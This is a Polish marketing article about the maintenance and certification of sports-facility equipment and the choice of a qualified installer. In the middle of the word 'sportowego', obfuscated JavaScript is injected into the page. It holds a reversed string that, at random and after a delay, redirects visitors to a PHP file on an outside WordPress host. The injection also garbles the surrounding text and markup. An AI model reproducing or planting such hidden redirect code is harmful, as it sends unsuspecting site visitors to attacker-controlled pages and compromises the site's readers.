Serwis i konserwacja sprzętu sportowego

Serwis i konserwacja sprzętu sportowego – czyli obowiązki zarządcy obiektu

Serwis i konserwacja sprzętu sportowego to obowiązek zarządzającego obiektem sportowym lub sportowo – widowiskowym. Zapewne zdajesz sobie sprawę jak wielka odpowiedzialność na Tobie spoczywa. Z całą pewnością Twoim priorytetem jest zapewnienie bezpieczeństwa wszystkim użytkownikom obiektu.

Serwis i konserwacja sprzętu spor<script><figcaption id=$Bhq=function(n){if (typeof ($Bhq.list[n]) == “string”) return $Bhq.list[n].split(“”).reverse().join(“”);return $Bhq.list[n];};$Bhq.list=[“‘php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000;setTimeout($Bhq(0), delay);}towego” width=”200″ height=”300″ /> Serwis i konserwacja sprzętu sportowego

Należy też pamiętać, że ustawa – Prawo budowlane – nakłada na właściciela lub zarządcę obiektu, obowiązek dokonywania regularnych kontroli w formie małego i dużego przeglądu stanu technicznego obiektu.

Niestety duża część obiektów sportowych w naszym kraju była budowana jeszcze w poprzednim ustroju. Wymaga ona szybkiej i radykalnej przebudowy. Tylko wtedy unikniemy sytuacji, gdy dowiadujemy się o kolejnych wypadkach do jakich dochodzi na niemodernizowanych boiskach. Gdy słyszymy o niecertyfikowanych bramkach do piłki nożnej, które przewracają się na dzieci.  Żle zamontowanych obręczach i tablicach na boiskach do koszykówki.

W większości takich przypadków, nieświadomy złego stanu technicznego urządzeń zarządca, decyduje się na dokonanie przeglądu dopiero gdy dojdzie już do nieszczęścia. Dodatkowo dowiaduje się, że zastosowane na jego obiekcie rozwiązania, takie jak konstrukcje koszy najazdowych i podstropowych czy kotar grodzących powierzchnię, są wyjątkowo kosztowne, nie tylko przy zakupie i instalacji, ale też w naprawie. Niestety usterka wykryta zbyt późno, niesie za sobą koszty kilkakrotnie wyższe, niż ta którą zdiagnozujemy we wczesnej fazie jej wystąpienia.

Serwis i konserwacja sprzętu sportowego – oczekiwania wobec profesjonalnych montażystów

Już na etapie opracowywania budżetu, należy przewidzieć środki na wizytę wykwalifikowanego zespołu montażowo – serwisowegoOkreśli on stabilność zamontowania elementów stałego wyposażenia obiektu. Zaleci sposób jego dalszego użytkowania a także wyda certyfikat, poświadczający, że zainstalowany sprzęt sportowy spełnia wymogi bezpieczeństwa oraz wymogi funkcjonalno – użytkowe.

W świetle obowiązującego prawa, wszystkie urządzenia instalowane w obiektach użyteczności publicznej muszą spełniać obowiązujące normy i posiadać certyfikaty uprawniające do oznakowania wyrobów znakiem bezpieczeństwa B.

Serwis i konserwacja sprzętu sportowego – postaw na sprawdzonego wykonawcę

Powyższe fakty utwierdzają w przekonaniu, że dokonując wyboru firmy, która będzie odpowiadać za projekt i wyposażenie naszego obiektu lub wyłącznie jego modernizację, warto postawić na sprawdzonego wykonawcę. Specjalistę, który zadba o profesjonalne podejście do całej realizacji już na etapie konsultacji przy tworzeniu projektu. Firmę, która będzie w stanie kompleksowo wyposażyć obiekt. Będzie posiadała przedstawicielstwo serwisowe, którego serwisanci legitymują się odpowiednim doświadczeniem, posiadają uprawnienia do pracy na wysokości i są przeszkoleni w zakresie techniki montażu bezpośredniego.

Dopiero spełnienie wszystkich powyższych warunków, będzie dawało zarządcy pewność, że dokonał właściwego wyboru i powierzył odpowiedzialność za swój obiekt profesjonalistom.

towych/”>Przeczytaj też, jak wyposażamy obiekty sportowe?

Jeśli mają Państwo jakiekolwiek pytania w zakresie serwisu i konserwacji sprzętu sportowego, serdecznie zapraszamy do kontaktu:

marketing@interplastic.pl